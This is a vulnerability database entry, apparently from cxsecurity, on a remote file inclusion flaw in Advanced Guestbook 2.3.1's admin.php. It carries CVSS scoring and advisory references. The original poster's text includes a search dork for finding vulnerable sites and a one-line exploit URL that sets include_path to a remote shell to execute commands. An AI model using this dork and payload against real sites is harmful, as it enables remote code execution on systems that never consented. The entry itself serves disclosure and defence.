Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

2006-11-09 / 2012-03-12
Credit: BrokeN-ProXy
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# Advanced Guestbook 2.3.1 (Admin.php) Remote File Include #%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# Author: BrokeN-ProXy Script : admin.php Found : www.hotscripts.com Risk : Dangerous Dork : "powered by: Advanced Guestbook 2.3.1" #%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# Exploit: www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd Notice: [AGuest Path] may be more than One, You are adviced to use the direct result os search. #%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# GreestZ: nEt^DeViL[ My Best friend ] .:. RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker ] .:. SnIpEr_SA .:. Eddy_BAck0o .:. Red Devils Crew[ |Màstr ] .:. PROHacker .:. Devil-00 .:. Red_Casper .:. ReMoTeR .:. Le CoPrA .:. Mor0ccan Islam Defenders Team .:. Mr.Elgaarh .:. Team-Evil [ X-BLooD-X ] .:. MosT3mR .:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=- And All Users in: www.3asfh.net/vb/ www.lezr.com/vb/ broken-proxy[at]Linuxmail[dot]org

References:

http://www.vupen.com/english/advisories/2006/4385
http://www.securityfocus.com/bid/20902
http://www.securityfocus.com/archive/1/archive/1/450729/100/0/threaded
http://secunia.com/advisories/22756
http://www.osvdb.org/30230


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top